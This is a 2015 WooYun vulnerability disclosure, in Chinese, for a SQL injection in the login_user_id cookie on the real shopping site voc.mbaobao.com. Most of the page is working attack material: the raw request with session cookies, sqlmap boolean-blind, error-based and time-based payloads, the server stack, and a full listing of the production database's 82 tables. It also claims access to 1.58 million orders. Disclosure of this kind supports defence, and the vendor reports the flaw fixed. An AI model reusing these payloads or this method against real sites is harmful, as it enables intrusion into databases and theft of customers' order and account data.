乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-25: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
GET /feedback/ HTTP/1.1Cookie: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1*; tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0Host: voc.mbaobao.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
注入点:Cookie中的login_user_id参数
18个库:
sqlmap resumed the following injection point(s) from stored session:---Parameter: Cookie #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=(SELECT (CASE WHEN (9164=9164) THEN 9164 ELSE 9164*(SELECT 9164 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1 AND (SELECT 2041 FROM(SELECT COUNT(*),CONCAT(0x7176626b71,(SELECT (ELT(2041=2041,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: PHPSESSID=41bjh1522q65o10krn5mgutr20; session_id=41bjh1522q65o10krn5mgutr20; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; tid=635813467344587495; bmw=4846a380d18e4af783aa0ce6e0bcbf12; online_type=1; sto-id-20480-www.mbaobao.com-sg=GHACAHAKFAAA; login_user_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rusd); tid=635813467344587495; online_type=1; bmw=4846a380d18e4af783aa0ce6e0bcbf12; login_user_id=0; login_user_id=0---web application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0Database: db_baobao178[82 tables]+---------------------------------------+| basic_encrypted_data || mshop_order_queue || tbl_ads || tbl_announcement || tbl_apply || tbl_apps_log || tbl_attestation || tbl_complaint || tbl_configure || tbl_delivery || tbl_delivery_price || tbl_download || tbl_faq || tbl_goods || tbl_goods_attribute || tbl_goods_attribute_list || tbl_goods_bk20120109 || tbl_goods_brand || tbl_goods_category || tbl_goods_deliver || tbl_goods_down_log || tbl_goods_forbidden || tbl_goods_group || tbl_goods_hot_sale || tbl_goods_image || tbl_goods_order || tbl_goods_order_item || tbl_goods_order_pay || tbl_goods_permission_group || tbl_goods_permission_group_bk20120109 || tbl_goods_promotion || tbl_goods_promotion_favorable || tbl_goods_sale_list || tbl_goods_search_keyword || tbl_goods_special || tbl_goods_stock_v2 || tbl_goods_supply_log || tbl_letter || tbl_letter_log || tbl_links || tbl_maibao || tbl_maibao_type || tbl_manager || tbl_material_download || tbl_new_seckill || tbl_news || tbl_news_category || tbl_order_favorable || tbl_order_returned || tbl_order_returned_goods || tbl_question || tbl_question_data || tbl_question_notice || tbl_question_quickreply || tbl_region || tbl_return_goods_item || tbl_return_order || tbl_return_order_amount || tbl_return_order_item || tbl_salers || tbl_seckill || tbl_split_shipment || tbl_split_shipment_item || tbl_stockout_register || tbl_taobao_order_tmp || tbl_update_revision_survey || tbl_user || tbl_user_activity_apply || tbl_user_alone_discount || tbl_user_bk20120106 || tbl_user_bk20120109 || tbl_user_bk20120209 || tbl_user_bk20120214 || tbl_user_bk20120218 || tbl_user_consignee || tbl_user_consignee_20110602 || tbl_user_favorites || tbl_user_level || tbl_user_vote || tbl_user_xiyou || tbl_vote || xiyou_test4 |+---------------------------------------+
158万订单信息:
取一个数据来证明:
危害等级:高
漏洞Rank:15
确认时间:2015-10-27 15:10
已修复,感谢洞主.
暂无